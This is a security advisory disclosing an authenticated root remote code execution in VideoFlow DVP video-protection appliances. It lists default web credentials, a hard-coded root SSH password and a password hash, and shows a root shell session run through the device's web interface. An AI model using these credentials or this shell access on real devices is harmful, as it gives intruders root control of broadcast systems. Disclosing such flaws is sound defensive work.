VideoFlow Digital Video Protection DVP 10 Authenticated Root Remote Code Execution
Vendor: VideoFlow Ltd.
Product web page: http://www.video-flow.com
Affected version: 2.10 (X-Prototype-Version: 1.6.0.2)
System = Indicate if the DVP is configured as Protector, Sentinel or Fortress
Version = The Operating System SW version number
Image version = Production Image version
System: DVP Protector
Version: 1.40.0.15(R) May 5 2015 05:27:05
Image version: 3.07i
System: DVP Protector
Version: 1.40.0.15(R) May 5 2015 05:27:05
Image version: 2.08
System: DVP Fortress
Version: 2.10.0.5(R) Jan 7 2018 03:26:35
Image version: 3.07
Summary: VideoFlow's Digital Video Protection (DVP) product is used by
leading companies worldwide to boost the reliability of IP networks, including
the public Internet, for professional live broadcast. DVP enables broadcast
companies to confidently contribute and distribute live video over IP with
unprecedented levels of service continuity, at a fraction of the cost of
leased lines or satellite links. It accelerates ROI by reducing operational
costs and enabling new revenue streams across a wide variety of markets.
Desc: The affected device suffers from authenticated remote code execution
vulnerability. Including a CSRF, a remote attacker can exploit this issue
and execute arbitrary system commands granting her system access with root
privileges.
Tested on: CentOS release 5.6 (Final) (2.6.18-238.12.1.el5)
CentOS release 5.10 (Final) (2.6.18-371.el5)
ConfD
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2018-5455
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5455.php
01.02.2018
---
Default credentials (web management):
admin:admin
oper:oper
private:private
public:public
devel:devel
Hard-Coded credentials (ssh):
root:videoflow
mom:$1$CGgdGXXG$0FmyyKMzcHgkKnUTZi5r./
-------------------------------- > Tools > System > Shell > --------------------------------
| |
| sh-3.2# id;pwd;uname -a;ls |
| uid=0(root) gid=0(root) |
| /dvp100/confd |
| Linux localhost.localdomain 2.6.18-371.el5 #1 SMP Tue Oct 1 08:37:57 EDT 2013 i6 |
| 86 i686 i386 GNU/Linux |
| aaa_cdb.fxs ietf-inet-types.fxs SNMP-USER-BASED-SM-MIB.fxs |
| authorization.fxs ietf-yang-types.fxs SNMPv2-MIB.fxs |
| browser.log IF-MIB.bin SNMPv2-SMI.fxs |
| community_init.xml IF-MIB.fxs SNMPv2-TC.fxs |
| confd.conf IPV6-TC.fxs SNMP-VIEW-BASED-ACM-MIB.fxs |
| config.web Makefile TRANSPORT-ADDRESS-MIB.fxs |
| docroot SNMP-COMMUNITY-MIB.fxs users.fxs |
| dvp.fxs SNMP-FRAMEWORK-MIB.fxs vacm_init.xml |
| dvp_init.xml SNMP-MPD-MIB.fxs webspec.dat |
| IANAifType-MIB.bin SNMP-NOTIFICATION-MIB.fxs |
| IANAifType-MIB.fxs SNMP-TARGET-MIB.fxs |
| sh-3.2# cat /etc/issue |
| CentOS release 5.10 (Final) |
| Kernel \r on an \m |
| |
--------------------------------------------------------------------------------------------